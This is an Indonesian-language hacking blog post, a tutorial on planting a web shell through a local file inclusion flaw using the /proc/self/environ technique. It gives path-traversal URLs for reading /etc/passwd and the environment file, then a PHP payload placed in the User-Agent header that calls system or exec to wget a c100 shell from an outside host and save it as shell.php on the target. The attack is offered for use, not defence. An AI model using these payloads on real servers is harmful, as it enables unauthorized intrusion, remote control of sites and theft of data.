Cara menanam shell lewat LFI (Local file disclosure) dengan metode proc/self/environ

Seperti biasa daripada lupa, mending saia post disini saja ^^ kebetulan juga harddisc di kompie aku juga udah menunjukkan penampakan Harddisc PuLL -=- virtual memory , LOL -=- dan semoga posting ini bermanfaat buat agan2 yg sudi mampir/nongkrong di Blog LOL1ds ini.. wo..o..o..!! Thx buat mastah2 yg udah mw sharing ilmunya terutama om gunslinger. 
silahkan dinikmati sambil pegang mouse sobat....

Dengan tutorial ini Om gunslinger akan menjelaskan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ.

Ok kita langsung saja… Cekidot..

1. kita menemukan website yang vulnerable terhadap serangan LFI.
contoh : http://site.com/info.php?file=news.php

2. coba kita ganti “news.php” dengan “../../../”.
contoh : http://site.com/info.php?file=../../../
lalu kita mendapat error, seperti berikut…
Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.
selanjutanya kita coba temukan /etc/passwd.
contoh : http://site.com/info.php?file=etc/passwd

Tetapi kita masih mendapat error seperti berikut :
Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
bagaimana jika kita naikan directorynya ?
mari kita coba…
contoh : http://site.com/info.php?file=../../../../../../../../../etc/passwd

Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :
<strong>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin</strong>

3. mari kita check apakah /proc/self/environ bisa kita akses ?
sekarang, ganti “/etc/passwd” dengan “/proc/self/environ”
contoh : http://site.com/info.php?file=../../../../../../../../../proc/self/environ

Jika anda mendapatkan yang seperti ini :

<strong>DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
</strong></pre>
<strong> PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80</strong>

Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD

4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi “http://site.com/info.php?file=../../../../../../../../../proc/self/environ”
lalu pada user-agent isikan dengan kode berikut :

<?system('wget http://r57.gen.tr/c100.txt -O shell.php');?>

atau

<?exec('wget http://r57.gen.tr/c100.txt -O shell.php');?>

lalu submit.

5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.
www.http://site.com/shell.php

6. sudah celacai... use own ur risk @_@

credit : gunslinger_blog

Article information: Description: Cara menanam shell lewat LFI (Local file disclosure) dengan metode proc/self/environ Rating: 4.5 - Reviewer: LolidsOfficialBlog - ItemReviewed: Cara menanam shell lewat LFI (Local file disclosure) dengan metode proc/self/environ

Related Tips, Tricks and Tutorials :